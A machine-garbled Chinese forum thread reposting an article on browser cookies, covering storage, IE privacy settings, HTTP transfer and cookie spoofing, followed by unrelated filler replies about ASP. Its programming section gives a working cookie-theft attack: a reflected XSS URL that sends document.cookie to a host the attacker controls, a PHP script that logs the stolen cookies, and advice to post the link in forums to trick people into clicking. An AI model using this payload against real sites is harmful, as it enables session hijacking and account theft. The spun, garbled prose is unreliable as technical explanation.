仓酷云
标题:
ASP网页设计周全懂得Cookie的传送流程、编程完成及...
[打印本页]
作者:
海妖
时间:
2015-1-16 22:35
标题:
ASP网页设计周全懂得Cookie的传送流程、编程完成及...
对于中小型web应用来说,php有很强的竞争力,linux+apache+mysql+php(lamp)的组合几乎可以胜任绝大多数网站的解决方案,对于大型应用来讲,对于系统架构要求更高,需要有成熟的框架支持,jsp的struts是个不错的框架,国内介绍它的资料也非常多,应用逐渐广泛起来。asp就不用说了,Cookie在英文中是小甜品的意义,而这个词我们总能在扫瞄器中看到,食物怎样会跟扫瞄器扯上干系呢?在你扫瞄之前上岸过的网站时大概会在网页中呈现:你好XX,感到很亲热,就仿佛是吃了一个小甜品一样。这实际上是经由过程会见你主机里边的一个文件来完成的,因而这个文件也就被称为了Cookie。想周全懂得Cookie吗?看看下文吧! 一.懂得Cookie合用工具:低级读者
Cookie是当你扫瞄某网站时,网站存储在你呆板上的一个小文本文件,它纪录了你的用户ID,暗码、扫瞄过的网页、停止的工夫等信息,当你再次离开该网站时,网站经由过程读取Cookie,得知你的相干信息,就能够做出响应的举措,如在页面显现接待你的口号,大概让你不必输出ID、暗码就间接登录等等。你能够在IE的“工具/Internet选项”的“惯例”选项卡中,选择“设置/检察文件”,检察一切保留到你电脑里的Cookie。这些文件一般是以
user@domain
格局定名的,user是你的当地用户名,domain是所会见的网站的域名。假如你利用NetsCape扫瞄器,则寄存在“C:PROGRAMFILESNETSCAPEUSERS”内里,与IE分歧的是,NETSCAPE是利用一个Cookie文件纪录一切网站的Cookies。
为了包管上彀平安我们必要对Cookie举行得当设置。翻开“工具/Internet选项”中的“隐私”选项卡(注重该设置只在IE6.0中存在,其他版本IE能够在“工具/Internet选项”的“平安”标签中单击“自界说级别”按钮,举行复杂调剂),调剂Cookie的平安级别。一般情形,能够将滑块调剂到“中高”大概“高”的地位。多半的论坛站点必要利用Cookie信息,假如你历来不往这些中央,能够将平安级调到“制止一切Cookies”。假如只是为了克制一般网站的Cookie,能够单击“编纂”按钮,将要屏障的网站增加到列表中。在“初级”按钮选项中,你能够对第一方Cookie和第三方的Cookie举行设置,第一方Cookie是你正在扫瞄的网站的Cookie,第三方Cookie非正在扫瞄的网站发给你的Cookie,一般要对第三方Cookie选择“回绝”,如。你假如必要保留Cookie,可使用IE的“导进导出”功效,翻开“文件/导进导出”,按提醒操纵便可。
Cookie中的内容年夜多半经由了加密处置,因而在我们看来只是一些毫偶然义的字母数字组合,只要服务器的CGI处置程序才晓得它们真实的寄义。经由过程一些软件我们能够检察到更多的内容,利用CookiePal软件检察到的Cookie信息,如所示。它为我们供应了Server、Expires、Name、Value等选项的内容。个中,Server是存储Cookie的网站,Expires纪录了Cookie的工夫和性命期,Name和value字段则是详细的数据(本报第10期第42版对该软件有具体先容)。
下载地点:
http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe
。
2、Cookie的传送流程合用工具:中级读者
当在扫瞄器地点栏中键进了一个Web站点的URL,扫瞄器会向该Web站点发送一个读取网页的哀求,并将了局在显现器上显现。这时候该网页在你的电脑上寻觅Amazon网站设置的Cookie文件,假如找到,扫瞄器会把Cookie文件中的数据连同后面输出的URL一同发送到Amazon服务器。服务器收到Cookie数据,就会在他的数据库中检索你的ID,你的购物纪录、团体喜欢等信息,并纪录下新的内容,增添到数据库和Cookie文件中往。假如没有检测到Cookie大概你的Cookie信息与数据库中的信息不切合,则申明你是第一次扫瞄该网站,服务器的CGI程序将为你创立新的ID信息,并保留到数据库中。
Cookie是使用了网页代码中的HTTP头信息举行传送的,扫瞄器的每次网页哀求,都能够陪伴Cookie传送,比方,扫瞄器的翻开或革新网页操纵。服务器将Cookie增加到网页的HTTP头信息中,陪伴网页数据传回到你的扫瞄器,扫瞄器会依据你电脑中的Cookie设置选择是不是保留这些数据。假如扫瞄器不同意Cookie保留,则关失落扫瞄器后,这些数据就消散。Cookie在电脑上保留的工夫是纷歧样的,这些都是由服务器的设置分歧决意得。Cookie有一个Expires(无效期)属性,这个属性决意了Cookie的保留工夫,服务器能够经由过程设定Expires字段的数值,来改动Cookie的保留工夫。假如不设置该属性,那末Cookie只在扫瞄网页时代无效,封闭扫瞄器,这些Cookie主动消散,尽年夜多半网站属于这类情形。一般情形下,Cookie包括Server、Expires、Name、Value这几个字段,个中对服务器有效的只是Name和Value字段,Expires等字段的内容仅仅是为了告知扫瞄器怎样处置这些Cookies。
3、Cookie的编程完成合用工具:初级读者
多半网页编程言语都供应了对Cookie的撑持。如JavaScript、VBScript、Delphi、ASP、SQL、PHP、C#等。在这些面向工具的编程言语中,对Cookie的编程使用基础上是类似的,大致历程为:先创立一个Cookie工具(Object),然后使用把持函数对Cookie举行赋值、读取、写进等操纵。那末怎样经由过程代码来猎取其他用户Cookie中的敏感信息?上面举行复杂的先容。
该办法次要有两步,起首要定位你必要搜集Cookie的网站,并对其举行剖析,并机关URL;然后体例搜集Cookie的PHP代码,并将其放到你能够把持的网站上,当不知情者单击了你机关的URL后能够实行该PHP代码。上面我们看详细的完成历程。
1.剖析并机关URL
起首翻开我们要搜集Cookie的网站,这里假定是
http://www.XXX.net
,上岸网站输出用户名“<A1>”(不含引号),对数据举行剖析抓包,失掉形如“http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x=28&ok.y=6”的代码,将“<A1>”改换为“<script>alert(document.cookie)</script>”再试;假如实行乐成,就入手下手机关URL:“http://www.XXX.net/txl/login/login.pl?username=<script>window.open("&passwd=&ok.x=28&ok.y=6>
http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6
”。个中
http:///www.cbifamily.org/cbi.php
就是你可以把持的某台主机上的一个剧本。必要注重的是“%2B”为标记“+”的URL编码,由于“+”将被作为空格处置。该URL就能够在论坛中公布,诱使他人点击了。
2.体例PHP剧本
该剧本的感化就是搜集Cookie文件,详细内容以下:
<?php
$info=getenv("QUERY_STRING");
if($info){
$fp=fopen("info.txt","a");
fwrite($fp,$info."
");
fclose($fp);
}
header("Location:
http://www.ckuyun.com
");
?>
4、Cookie的平安成绩合用工具:一切但愿上彀平安的读者
1.Cookie棍骗
Cookie纪录着用户的帐户ID、暗码之类的信息,假如在网上传送,一般利用的是MD5办法加密。如许经由加密处置后的信息,即便被收集上一些心怀叵测的人截获,也看不懂,由于他看到的只是一些偶然义的字母和数字。但是,如今碰到的成绩是,截获Cookie的人不必要晓得这些字符串的寄义,他们只需把他人的Cookie向服务器提交,而且可以经由过程考证,他们就能够假充受益人的身份,上岸网站。这类办法叫做Cookie棍骗。Cookie棍骗完成的条件前提是服务器的考证程序存在毛病,而且假充者要取得被假充的人的Cookie信息。今朝网站的考证程序要扫除一切不法登录长短常坚苦的,比方,编写考证程序利用的言语大概存在毛病。并且要取得他人Cookie是很简单的,用撑持Cookie的言语编写一小段代码就能够完成(详细办法见三),只需把这段代码放到收集里,那末一切人的Cookie都可以被搜集。假如一个论坛同意HTML代码大概同意利用Flash标签就能够使用这些手艺搜集Cookie的代码放到论坛里,然后给帖子取一个吸惹人的主题,写上风趣的内容,很快就能够搜集到大批的Cookie。在论坛上,有很多人的暗码就被这类办法盗往的。至于怎样提防,今朝还没有殊效药,我们也只能利用一般的防护办法,不要在论坛里利用主要的暗码,也不要利用IE主动保留暗码的功效,和只管不上岸不懂得内幕的网站。
2.Flash的代码隐患
Flash中有一个getURL()函数,Flash能够使用这个函数主动翻开指定的网页。因而它大概把你引向一个包括歹意代码的网站。打个例如,当你在本人电脑上浏览优美的Flash动画时,动画帧里的代码大概已悄然地连上彀,并翻开了一个极小的包括有特别代码的页面。这个页面能够搜集你的Cookie、也能够做一些其他的事变,好比在你的呆板上栽培木马乃至格局化你的硬盘等等。关于Flash的这类举动,网站是没法克制的,由于这是Flash文件的外部举动。我们所能做到的,假如是在当地扫瞄只管翻开防火墙,假如防火墙提醒的向外发送的数据包其实不为你知悉,最好克制。假如是在Internet上浏览,最好找一些出名的年夜网站。
想法是和程序员的想法不一样的.至于为什么.大家去想一想.跟心理学有关的
作者:
透明
时间:
2015-1-19 17:55
代码的可重用性差:由于是面向结构的编程方式,并且混合html,所以可能页面原型修改一点,整个程序都需要修改,更别提代码重用了。
作者:
蒙在股里
时间:
2015-2-4 14:50
你可以通过继承已有的对象最大限度保护你以前的投资。并且C#和C++、Java一样提供了完善的调试/纠错体系。
作者:
不帅
时间:
2015-2-10 02:05
代码逻辑混乱,难于管理:由于ASP是脚本语言混合html编程,所以你很难看清代码的逻辑关系,并且随着程序的复杂性增加,使得代码的管理十分困难,甚至超出一个程序员所能达到的管理能力,从而造成出错或这样那样的问题。
作者:
仓酷云
时间:
2015-2-28 14:50
Session:这个存储跟客户端会话过程的数据,默认20分钟失效
作者:
再现理想
时间:
2015-3-10 00:04
他的语法和设计思路和VB完全相同,导致很多ASP的书都留一句“相关内容请参考VB的相关教材....”更糟糕的是,相当多的ASP教程混合了Javascript,VBscript等等脚本语言,搞的初学者。
作者:
第二个灵魂
时间:
2015-3-17 03:10
交流是必要的,不管是生活还是学习我们都要试着去交流,通过交流我们可以学到很多我们自己本身所没有的知识,可以分享别人的经验甚至经历。
作者:
谁可相欹
时间:
2015-3-23 18:10
ASP(ActiveServerPages)是Microsfot公司1996年11月推出的WEB应用程序开发技术,它既不是一种程序语言,也不是一种开发工具,而是一种技术框架,不须使用微软的产品就能编写它的代码,能产生和执行动态、交互式、高效率的站占服务器的应用程序。
欢迎光临 仓酷云 (http://ckuyun.com/)
Powered by Discuz! X3.2